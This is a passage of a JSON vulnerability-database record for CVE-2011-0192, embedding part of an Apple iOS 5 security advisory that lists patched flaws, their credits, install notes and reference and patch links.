revealing some\ninformation about the previous data. If the same connection was\nattempted repeatedly the attacker may eventually have been able to\ndecrypt the data being sent, such as a password. This issue is\naddressed by adding support for TLS 1.2. \nCVE-ID\nCVE-2011-3389\n\nHome screen\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  Switching between applications may lead to the disclosure of\nsensitive application information\nDescription:  When switching between applications with the four-\nfinger app switching gesture, the display could have revealed the\nprevious application state. This issue is addressed by ensuring that\nthe system properly calls the applicationWillResignActive: method\nwhen transitioning between applications. \nCVE-ID\nCVE-2011-3431 : Abe White of Hedonic Software Inc. \nCVE-ID\nCVE-2011-0241 : Cyril CATTIAUX of Tessi Technologies\n\nInternational Components for Unicode\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  Applications that use ICU may be vulnerable to an unexpected\napplication termination or arbitrary code execution\nDescription:  A buffer overflow issue existed in ICU\u0027s generation of\ncollation keys for long strings of mostly uppercase letters. \nCVE-ID\nCVE-2011-0206 : David Bienvenu of Mozilla\n\nKernel\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  A remote attacker may cause a device reset\nDescription:  The kernel failed to promptly reclaim memory from\nincomplete TCP connections. An attacker with the ability to connect\nto a listening service on an iOS device could exhaust system\nresources. \nCVE-ID\nCVE-2011-3259 : Wouter van der Veer of Topicus I\u0026I, and Josh Enders\n\nKernel\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  A local user may be able to cause a system reset\nDescription:  A null dereference issue existed in the handling of\nIPV6 socket options. \nCVE-ID\nCVE-2011-1132 : Thomas Clement of Intego\n\nKeyboards\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  A user may be able to determine information about the last\ncharacter of a password\nDescription:  The keyboard used to type the last character of a\npassword was briefly displayed the next time the keyboard was used. \nCVE-ID\nCVE-2011-3245 : Paul Mousdicas\n\nlibxml\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  Visiting a maliciously crafted website may lead to an\nunexpected application termination or arbitrary code execution\nDescription:  A one-byte heap buffer overflow existed in libxml\u0027s\nhandling of XML data. \nCVE-ID\nCVE-2011-0216 : Billy Rios of the Google Security Team\n\nOfficeImport\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  Viewing a maliciously crafted Word file may lead to an\nunexpected application termination or arbitrary code execution\nDescription:  A buffer overflow existed in OfficeImport\u0027s handling of\nMicrosoft Word documents. \nCVE-ID\nCVE-2011-3260 : Tobias Klein working with Verisign iDefense Labs\n\nOfficeImport\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  Viewing a maliciously crafted Excel file may lead to an\nunexpected application termination or arbitrary code execution\nDescription:  A double free issue existed in OfficeImport\u0027s handling\nof Excel files. \nCVE-ID\nCVE-2011-3261 : Tobias Klein of www.trapkit.de\n\nOfficeImport\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  Downloading a maliciously crafted Microsoft Office file may\nlead to an unexpected application termination or arbitrary code\nexecution\nDescription:  A memory corruption issue existed in OfficeImport\u0027s\nhandling of Microsoft Office files. \nCVE-ID\nCVE-2011-0208 : Tobias Klein working with iDefense VCP\n\nOfficeImport\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  Downloading a maliciously crafted Excel file may lead to an\nunexpected application termination or arbitrary code execution\nDescription:  A memory corruption issue existed in OfficeImport\u0027s\nhandling of Excel files. \nCVE-ID\nCVE-2011-0184 : Tobias Klein working with iDefense VCP\n\nSafari\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  Opening maliciously crafted files on certain websites may\nlead to a cross-site scripting attack\nDescription:  iOS did not support the \u0027attachment\u0027 value for the HTTP\nContent-Disposition header. This header is used by many websites to\nserve files that were uploaded to the site by a third-party, such as\nattachments in web-based e-mail applications. Any script in files\nserved with this header value would run as if the file had been\nserved inline, with full access to other resources on the origin\nserver. This issue is addressed by loading attachments in an isolated\nsecurity origin with no access to resources on other sites. \nCVE-ID\nCVE-2011-3426 : Christian Matthies working with iDefense VCP,\nYoshinori Oota from Business Architects Inc working with JP/CERT\n\nSettings\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  An attacker with physical access to a device may be able to\nrecover the restrictions passcode\nDescription:  The parental restrictions functionality enforces UI\nrestrictions. Configuring parental restrictions is protected by a\npasscode, which was previously stored in plaintext on disk. This\nissue is addressed by securely storing the parental restrictions\npasscode in the system keychain. \nCVE-ID\nCVE-2011-3429 : an anonymous reporter\n\nSettings\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  Misleading UI\nDescription:  Configurations and settings applied via configuration\nprofiles did not appear to function properly under any non-English\nlanguage. Settings could be improperly displayed as a result. This\nissue is addressed by fixing a localization error. \nCVE-ID\nCVE-2011-3430 : Florian Kreitmaier of Siemens CERT\n\nUIKit Alerts\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  Visiting a malicious website may cause an unexpected device\nhang\nDescription:  An excessive maximum text layout length permitted\nmalicious websites to cause iOS to hang when drawing acceptance\ndialogs for very long tel: URIs. This issue is addressed by using a\nmore reasonable maximum URI size. \nCVE-ID\nCVE-2011-3432 : Simon Young of Anglia Ruskin University\n\nWebKit\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  Visiting a maliciously crafted website may lead to an\nunexpected application termination or arbitrary code execution\nDescription:  Multiple memory corruption issues existed in WebKit. \nCVE-ID\nCVE-2011-0218 : SkyLined of Google Chrome Security Team\nCVE-2011-0221 : Abhishek Arya (Inferno) of Google Chrome Security\nTeam\nCVE-2011-0222 : Nikita Tarakanov and Alex Bazhanyuk of the CISS\nResearch Team, and Abhishek Arya (Inferno) of Google Chrome Security\nTeam\nCVE-2011-0225 : Abhishek Arya (Inferno) of Google Chrome Security\nTeam\nCVE-2011-0232 : J23 working with TippingPoint\u0027s Zero Day Initiative\nCVE-2011-0233 : wushi of team509 working with TippingPoint\u0027s Zero Day\nInitiative\nCVE-2011-0234 : Rob King working with TippingPoint\u0027s Zero Day\nInitiative, wushi of team509 working with TippingPoint\u0027s Zero Day\nInitiative\nCVE-2011-0235 : Abhishek Arya (Inferno) of Google Chrome Security\nTeam\nCVE-2011-0238 : Adam Barth of Google Chrome Security Team\nCVE-2011-0254 : An anonymous researcher working with TippingPoint\u0027s\nZero Day Initiative\nCVE-2011-0255 : An anonymous reporter working with TippingPoint\u0027s\nZero Day Initiative\nCVE-2011-0981 : Rik Cabanier of Adobe Systems, Inc\nCVE-2011-0983 : Martin Barbella\nCVE-2011-1109 : Sergey Glazunov\nCVE-2011-1114 : Martin Barbella\nCVE-2011-1115 : Martin Barbella\nCVE-2011-1117 : wushi of team509\nCVE-2011-1121 : miaubiz\nCVE-2011-1188 : Martin Barbella\nCVE-2011-1203 : Sergey Glazunov\nCVE-2011-1204 : Sergey Glazunov\nCVE-2011-1288 : Andreas Kling of Nokia\nCVE-2011-1293 : Sergey Glazunov\nCVE-2011-1296 : Sergey Glazunov\nCVE-2011-1449 : Marek Majkowski\nCVE-2011-1451 : Sergey Glazunov\nCVE-2011-1453 : wushi of team509 working with TippingPoint\u0027s Zero Day\nInitiative\nCVE-2011-1457 : John Knottenbelt of Google\nCVE-2011-1462 : wushi of team509\nCVE-2011-1797 : wushi of team509\nCVE-2011-2338 : Abhishek Arya (Inferno) of Google Chrome Security\nTeam using AddressSanitizer\nCVE-2011-2339 : Cris Neckar of the Google Chrome Security Team\nCVE-2011-2341 : Apple\nCVE-2011-2351 : miaubiz\nCVE-2011-2352 : Apple\nCVE-2011-2354 : Apple\nCVE-2011-2356 : Adam Barth and Abhishek Arya of Google Chrome\nSecurity Team using AddressSanitizer\nCVE-2011-2359 : miaubiz\nCVE-2011-2788 : Mikolaj Malecki of Samsung\nCVE-2011-2790 : miaubiz\nCVE-2011-2792 : miaubiz\nCVE-2011-2797 : miaubiz\nCVE-2011-2799 : miaubiz\nCVE-2011-2809 : Abhishek Arya (Inferno) of Google Chrome Security\nTeam\nCVE-2011-2813 : Cris Neckar of Google Chrome Security Team using\nAddressSanitizer\nCVE-2011-2814 : Abhishek Arya (Inferno) of Google Chrome Security\nTeam using AddressSanitizer\nCVE-2011-2816 : Apple\nCVE-2011-2817 : Abhishek Arya (Inferno) of Google Chrome Security\nTeam using AddressSanitizer\nCVE-2011-2818 : Martin Barbella\nCVE-2011-2820 : Raman Tenneti and Philip Rogers of Google\nCVE-2011-2823 : SkyLined of Google Chrome Security Team\nCVE-2011-2827 : miaubiz\nCVE-2011-2831 : Abhishek Arya (Inferno) of Google Chrome Security\nTeam using AddressSanitizer\nCVE-2011-3232 : Aki Helin of OUSPG\nCVE-2011-3234 : miaubiz\nCVE-2011-3235 : Dimitri Glazkov, Kent Tamura, Dominic Cooney of the\nChromium development community, and Abhishek Arya (Inferno) of Google\nChrome Security Team\nCVE-2011-3236 : Abhishek Arya (Inferno) of Google Chrome Security\nTeam using AddressSanitizer\nCVE-2011-3237 : Dimitri Glazkov, Kent Tamura, Dominic Cooney of the\nChromium development community, and Abhishek Arya (Inferno) of Google\nChrome Security Team\nCVE-2011-3244 : vkouchna\n\nWebKit\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  Visiting a maliciously crafted website may lead to a cross-\nsite scripting attack\nDescription:  A cross-origin issue existed in the handling of URLs\nwith an embedded username. This issue is addressed through improved\nhandling of URLs with an embedded username. \nCVE-ID\nCVE-2011-0242 : Jobert Abma of Online24\n\nWebKit\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  Visiting a maliciously crafted website may lead to a cross-\nsite scripting attack\nDescription:  A cross-origin issue existed in the handling of DOM\nnodes. \nCVE-ID\nCVE-2011-1295 : Sergey Glazunov\n\nWebKit\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  A maliciously crafted website may be able to cause a\ndifferent URL to be shown in the address bar\nDescription:  A URL spoofing issue existed in the handling of the DOM\nhistory object. \nCVE-ID\nCVE-2011-1107 : Jordi Chancel\n\nWebKit\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  Visiting a maliciously crafted website may lead to arbitrary\ncode execution\nDescription:  A configuration issue existed in WebKit\u0027s use of\nlibxslt. Visiting a maliciously crafted website may lead to arbitrary\nfiles being created with the privileges of the user, which may lead\nto arbitrary code execution. This issue is addressed through improved\nlibxslt security settings. \nCVE-ID\nCVE-2011-1774 : Nicolas Gregoire of Agarri\n\nWebKit\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  Visiting a malicious website and dragging content in the\npage may lead to an information disclosure\nDescription:  A cross-origin issue existed in WebKit\u0027s handling of\nHTML5 drag and drop. This issue is addressed by disallowing drag and\ndrop across different origins. \nCVE-ID\nCVE-2011-0166 : Michal Zalewski of Google Inc. \n\nWebKit\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  Visiting a maliciously crafted website may lead to an\ninformation disclosure\nDescription:  A cross-origin issue existed in the handling of Web\nWorkers. \nCVE-ID\nCVE-2011-1190 : Daniel Divricean of divricean.ro\n\nWebKit\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  Visiting a maliciously crafted website may lead to a cross-\nsite scripting attack\nDescription:  A cross-origin issue existed in the handling of the\nwindow.open method. \nCVE-ID\nCVE-2011-2805 : Sergey Glazunov\n\nWebKit\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  Visiting a maliciously crafted website may lead to a cross-\nsite scripting attack\nDescription:  A cross-origin issue existed in the handling of\ninactive DOM windows. \nCVE-ID\nCVE-2011-3243 : Sergey Glazunov\n\nWebKit\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  Visiting a maliciously crafted website may lead to a cross-\nsite scripting attack\nDescription:  A cross-origin issue existed in the handling of the\ndocument.documentURI property. \nCVE-ID\nCVE-2011-2819 : Sergey Glazunov\n\nWebKit\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  A maliciously crafted website may be able to track the URLs\nthat a user visits within a frame\nDescription:  A cross-origin issue existed in the handling of the\nbeforeload event. \nCVE-ID\nCVE-2011-2800 : Juho Nurminen\n\nWiFi\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  WiFi credentials may be logged to a local file\nDescription:  WiFi credentials including the passphrase and\nencryption keys were logged to a file that was readable by\napplications on the system. This is resolved by no longer logging\nthese credentials. \nCVE-ID\nCVE-2011-3434 : Laurent OUDOT of TEHTRI Security\n\nInstallation note:\n\nThis update is only available through iTunes, and will not appear\nin your computer\u0027s Software Update application, or in the Apple\nDownloads site. Make sure you have an Internet connection and have\ninstalled the latest version of iTunes from www.apple.com/itunes/\n\niTunes will automatically check Apple\u0027s update server on its weekly\nschedule. When an update is detected, it will download it. When\nthe iPhone, iPod touch or iPad is docked, iTunes will present the\nuser with the option to install the update. We recommend applying\nthe update immediately if possible. Selecting Don\u0027t Install will\npresent the option the next time you connect your iPhone, iPod touch,\nor iPad. \n\nThe automatic update process may take up to a week depending on the\nday that iTunes checks for updates. You may manually obtain the\nupdate via the Check for Updates button within iTunes. After doing\nthis, the update can be applied when your iPhone, iPod touch, or iPad\nis docked to your computer. \n\nTo check that the iPhone, iPod touch, or iPad has been updated:\n\n* Navigate to Settings\n* Select General\n* Select About. The version after applying this update will be\n\"5 (9A334)\". \n\nInformation will also be posted to the Apple Security Updates\nweb site: http://support.apple.com/kb/HT1222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG/MacGPG2 v2.0.16 (Darwin)\n\niQEcBAEBAgAGBQJOldmtAAoJEGnF2JsdZQee/qMIAIPxmIiOqj+FMLFHZtPeC/Dp\n3s4JliKOOgNnjXkxErfaNvYGmeVbDaUER5jdVrWccTauzlYmy8G4uK0An2GD2YiP\ngB5AiCQXpONdBCi38QNdRqrYoYjc8Sa0nUp4r5uWPoiHoj5KfxvBpgygEL+zjHXS\nfmnrONOCWhOYp0w4q6mdTg5BH2uJCbXscD/JjbmgHQI0Vs/iUZKSRyqFo2b0Mvze\nNiSyzcj/4l62Cxx7xM9VbdrYL7Al2yyHfNYJQsZmoeDUlJQcdgEgEMXvOuhY3sFK\nmaxYr2oCp6Mtf53fplAeJIV4ijLynEWAKxTuTznAyW1k7oiGrDTfORSFKPEB9MQ=\n=LCQZ\n-----END PGP SIGNATURE-----\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2011-0192"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2011-001352"
          },
          {
            "db": "BID",
            "id": "46658"
          },
          {
            "db": "VULHUB",
            "id": "VHN-48137"
          },
          {
            "db": "PACKETSTORM",
            "id": "100027"
          },
          {
            "db": "PACKETSTORM",
            "id": "99031"
          },
          {
            "db": "PACKETSTORM",
            "id": "99337"
          },
          {
            "db": "PACKETSTORM",
            "id": "116799"
          },
          {
            "db": "PACKETSTORM",
            "id": "105737"
          },
          {
            "db": "PACKETSTORM",
            "id": "105736"
          }
        ],
        "trust": 2.52
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2011-0192",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "46658",
            "trust": 2.2
          },
          {
            "db": "SECUNIA",
            "id": "43593",
            "trust": 1.9
          },
          {
            "db": "SECUNIA",
            "id": "43664",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "50726",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "43585",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "44135",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "43934",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "44117",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2011-0960",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2011-0551",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2011-0599",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2011-0621",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2011-0845",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2011-0930",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2011-0905",
            "trust": 1.1
          },
          {
            "db": "SECTRACK",
            "id": "1025153",
            "trust": 1.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2011-001352",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201103-112",
            "trust": 0.7
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2020.2340",
            "trust": 0.6
          },
          {
            "db": "PACKETSTORM",
            "id": "105737",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "99068",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-48137",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "100027",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "99031",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "99337",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "116799",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "105736",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-48137"
          },
          {
            "db": "BID",
            "id": "46658"
          },
          {
            "db": "PACKETSTORM",
            "id": "100027"
          },
          {
            "db": "PACKETSTORM",
            "id": "99031"
          },
          {
            "db": "PACKETSTORM",
            "id": "99337"
          },
          {
            "db": "PACKETSTORM",
            "id": "116799"
          },
          {
            "db": "PACKETSTORM",
            "id": "105737"
          },
          {
            "db": "PACKETSTORM",
            "id": "105736"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201103-112"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2011-001352"
          },
          {
            "db": "NVD",
            "id": "CVE-2011-0192"
          }
        ]
      },
      "id": "VAR-201103-0291",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-48137"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2026-03-09T20:22:48.116000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "HT4554",
            "trust": 0.8,
            "url": "http://support.apple.com/kb/HT4554"
          },
          {
            "title": "HT4566",
            "trust": 0.8,
            "url": "http://support.apple.com/kb/HT4566"
          },
          {
            "title": "HT4564",
            "trust": 0.8,
            "url": "http://support.apple.com/kb/HT4564"
          },
          {
            "title": "HT4565",
            "trust": 0.8,
            "url": "http://support.apple.com/kb/HT4565"
          },
          {
            "title": "HT4581",
            "trust": 0.8,
            "url": "http://support.apple.com/kb/HT4581"
          },
          {
            "title": "HT4566",
            "trust": 0.8,
            "url": "http://support.apple.com/kb/HT4566?viewlocale=ja_JP"
          },
          {
            "title": "HT4564",
            "trust": 0.8,
            "url": "http://support.apple.com/kb/HT4564?viewlocale=ja_JP"
          },
          {
            "title": "HT4565",
            "trust": 0.8,
            "url": "http://support.apple.com/kb/HT4565?viewlocale=ja_JP"
          },
          {
            "title": "HT4581",
            "trust": 0.8,
            "url": "http://support.apple.com/kb/HT4581?viewlocale=ja_JP"
          },
          {
            "title": "HT4554",
            "trust": 0.8,
            "url": "http://support.apple.com/kb/HT4554?viewlocale=ja_JP"
          },
          {
            "title": "FTP Directory",
            "trust": 0.8,
            "url": "ftp://ftp.remotesensing.org/pub/libtiff/"
          },
          {
            "title": "RHSA-2011:0318",
            "trust": 0.8,
            "url": "https://rhn.redhat.com/errata/RHSA-2011-0318.html"
          },
          {
            "title": "Multiple vulnerabilities in LibTIFF",
            "trust": 0.8,
            "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_libtiff"
          },
          {
            "title": "iTunes 10.2",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=39588"
          },
          {
            "title": "iTunes 10.2 for Windows (64 bit)",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=39587"
          }
        ],
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201103-112"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2011-001352"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-48137"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2011-001352"
          },
          {
            "db": "NVD",
            "id": "CVE-2011-0192"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.9,
            "url": "http://www.securityfocus.com/bid/46658"
          },
          {
            "trust": 1.9,
            "url": "http://secunia.com/advisories/43593"
          },
          {
            "trust": 1.2,
            "url": "http://security.gentoo.org/glsa/glsa-201209-02.xml"
          },
          {
            "trust": 1.1,
            "url": "http://lists.apple.com/archives/security-announce/2011/mar/msg00000.html"
          },
          {
            "trust": 1.1,
            "url": "http://lists.apple.com/archives/security-announce/2011//mar/msg00003.html"
          },
          {
            "trust": 1.1,
            "url": "http://lists.apple.com/archives/security-announce/2011//mar/msg00004.html"
          },
          {
            "trust": 1.1,
            "url": "http://lists.apple.com/archives/security-announce/2011//mar/msg00005.html"
          },
          {
            "trust": 1.1,
            "url": "http://lists.apple.com/archives/security-announce/2011/mar/msg00006.html"
          },
          {
            "trust": 1.1,
            "url": "http://lists.apple.com/archives/security-announce/2011//oct/msg00001.html"
          },
          {
            "trust": 1.1,
            "url": "http://lists.apple.com/archives/security-announce/2011//oct/msg00002.html"
          },
          {
            "trust": 1.1,
            "url": "http://blackberry.com/btsc/kb27244"
          },
          {
            "trust": 1.1,
            "url": "http://support.apple.com/kb/ht4554"
          },
          {
            "trust": 1.1,
            "url": "http://support.apple.com/kb/ht4564"
          },
          {
            "trust": 1.1,
            "url": "http://support.apple.com/kb/ht4565"
          },
          {
            "trust": 1.1,
            "url": "http://support.apple.com/kb/ht4566"
          },
          {
            "trust": 1.1,
            "url": "http://support.apple.com/kb/ht4581"
          },
          {
            "trust": 1.1,
            "url": "http://support.apple.com/kb/ht4999"
          },
          {
            "trust": 1.1,
            "url": "http://support.apple.com/kb/ht5001"
          },
          {
            "trust": 1.1,
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=678635"
          },
          {
            "trust": 1.1,
            "url": "http://www.debian.org/security/2011/dsa-2210"
          },
          {
            "trust": 1.1,
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-march/055683.html"
          },
          {
            "trust": 1.1,
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-march/055240.html"
          },
          {
            "trust": 1.1,
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-april/057840.html"
          },
          {
            "trust": 1.1,
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-april/057763.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2011:043"
          },
          {
            "trust": 1.1,
            "url": "http://www.redhat.com/support/errata/rhsa-2011-0318.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.securitytracker.com/id?1025153"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/43585"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/43664"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/43934"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/44117"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/44135"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/50726"
          },
          {
            "trust": 1.1,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2011-04/msg00000.html"
          },
          {
            "trust": 1.1,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2011-05/msg00005.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2011/0551"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2011/0599"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2011/0621"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2011/0845"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2011/0905"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2011/0930"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2011/0960"
          },
          {
            "trust": 1.0,
            "url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026y=2011\u0026m=slackware-security.587820"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-0192"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu643615"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu867452"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu636925"
          },
          {
